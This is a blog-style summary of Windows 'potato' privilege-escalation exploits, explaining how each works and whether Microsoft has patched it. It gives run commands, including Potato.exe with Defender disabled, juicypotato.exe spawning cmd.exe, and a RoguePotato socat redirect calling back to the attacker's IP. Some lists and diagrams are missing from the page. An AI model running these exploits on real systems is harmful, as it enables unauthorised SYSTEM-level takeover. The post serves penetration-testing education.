Potatoes - Windows Privilege Escalation

Title

Hot, Rotten, Lonely, Juicy, Rogue, Sweet, Generic potatoes. There are a lot of different potatoes used to escalate privileges from Windows Service Accounts to NT AUTHORITY/SYSTEM. But, what are the differences? When should I use each one? Do they still work? This post is a summary of each kind of potato, when to use it and how to achieve successful exploitation.


TL/DR

If you do not want to use Sweet Potato:


Hot Potato

Hot Potato was the first potato and was the code name of a Windows privilege escalation technique discovered by Stephen Breen @breenmachine. This vulnerability affects Windows 7, 8, 10, Server 2008, and Server 2012.

How does this works?

Image Diagram 1

Therefore, the vulnerability uses the following:

To understand deeper this technique, the researchers post/video are recommended:

Exploitation

Download the binary from the repository: Here

Potato.exe -ip -cmd [cmd to run] -disable_exhaust true -disable_defender true

Is this vulnerability exploitable right now?

Microsoft patched this (MS16-075) by disallowing same-protocol NTLM authentication using a challenge that is already in flight. What this means is that SMB->SMB NTLM relay from one host back to itself will no longer work. MS16-077 WPAD Name Resolution will not use NetBIOS (CVE-2016-3213) and does not send credential when requesting the PAC file(CVE-2016-3236). WAPD MITM Attack is patched.

Time to Rotten Potato.


Rotten Potato

Rotten Potato is quite complex, but mainly it uses 3 things:

Image Diagram 2

To understand deeper this technique, the researchers post/video are recommended:

Exploitation

Download the binary from the repository: Here

After having a meterpreter shell with incognito mode loaded:

MSFRottenPotato.exe t c:\windows\temp\test.bat

Is this vulnerability exploitable right now?

Decoder analyzed if this technique could be exploited in the latest Windows version, in this blog post: https://decoder.cloud/2018/10/29/no-more-rotten-juicy-potato/

To sum up:

Therefore, this technique won’t work on versions >= Windows 10 1809 & Windows Server 2019


Lonely Potato

Lonely Potato was the adaptation of Rotten Potato without relying on meterpreter and the “incognito” module made by Decoder.

https://decoder.cloud/2017/12/23/the-lonely-potato/

Is this vulnerability exploitable right now?

Lonely Potato is deprecated and after visiting the repository, there is an indication to move to Juicy Potato.


Juicy Potato

Juicy Potato is Rotten Potato on steroids. It allows a more flexible way to exploit the vulnerability. In this case, ohpe & decoder during a Windows build review found a setup where BITS was intentionally disabled and port 6666 was taken, therefore Rotten Potato PoC won’t work.

What are BITS and CLSID?

Rotten Potato’s PoC used BITS with a default CLSID

// Use a known local system service COM server, in this cast BITSv1
Guid clsid = new Guid("4991d34b-80a1-4291-83b6-3328366b9097");

They discovered that other than BITS there are several out of process COM servers identified by specific CLSIDs that could be abused. They need al least to:

And they found a lot of them: http://ohpe.it/juicy-potato/CLSID/

What are the advantages?

Exploitation

Download the binary from the repository: Here

juicypotato.exe -l 1337 -p c:\windows\system32\cmd.exe -t * -c {F87B28F1-DA9A-4F35-8EC0-800EFCF26B83}

Does this still works?

Same case as Rotten potato.


Rogue Potato

After reading fixes regarding Rotten/Juicy potato, the following conclusions can be drawn:

How does this works?

Image Diagram 3

To dig deeper read the author’s blog post: https://decoder.cloud/2020/05/11/no-more-juicypotato-old-story-welcome-roguepotato/

What do you need to make it work?

More info: https://0xdf.gitlab.io/2020/09/08/roguepotato-on-remote.html

Exploitation

Download the binary from the repository: Here

Run in your machine the socat redirection (replace VICTIM_IP):

socat tcp-listen:135,reuseaddr,fork tcp:VICTIM_IP:9999

Execute PoC (replace YOUR_IP and command):

.\RoguePotato.exe -r YOUR_IP -e "command" -l 9999

Sweet Potato

Sweet Potato is a collection of various native Windows privilege escalation techniques from service accounts to SYSTEM. It has been created by @EthicalChaos and includes:

It is the definitelly potatoe, a potatoe to rule them all.

Exploitation

Download the binary from the repository: Here

./SweetPotato.exe

  -c, --clsid=VALUE          CLSID (default BITS:
                               4991D34B-80A1-4291-83B6-3328366B9097)
  -m, --method=VALUE         Auto,User,Thread (default Auto)
  -p, --prog=VALUE           Program to launch (default cmd.exe)
  -a, --args=VALUE           Arguments for program (default null)
  -e, --exploit=VALUE        Exploit mode
                               [DCOM|WinRM|EfsRpc|PrintSpoofer(default)]
  -l, --listenPort=VALUE     COM server listen port (default 6666)
  -h, --help                 Display this help


Generic Potato

Wait, another potato? Yes. Generic Potato is a modified version of SweetPotato by @micahvandeusen to support impersonating authentication over HTTP and/or named pipes.

This allows for local privilege escalation from SSRF and/or file writes. It is handy when:

How do we abuse this? All we need is to cause an application or user with higher privileges to authenticate to us over HTTP or write to our named pipe. GenericPotato will steal the token and run a command for us as the user running the web server, probably system. More information ca be found here

Exploitation

Download the binary from the repository: Here

.\GenericPotato.exe

  -m, --method=VALUE         Auto,User,Thread (default Auto)
  -p, --prog=VALUE           Program to launch (default cmd.exe)
  -a, --args=VALUE           Arguments for program (default null)
  -e, --exploit=VALUE        Exploit mode [HTTP|NamedPipe(default)]
  -l, --port=VALUE           HTTP port to listen on (default 8888)
  -i, --host=VALUE           HTTP host to listen on (default 127.0.0.1)
  -h, --help                 Display this help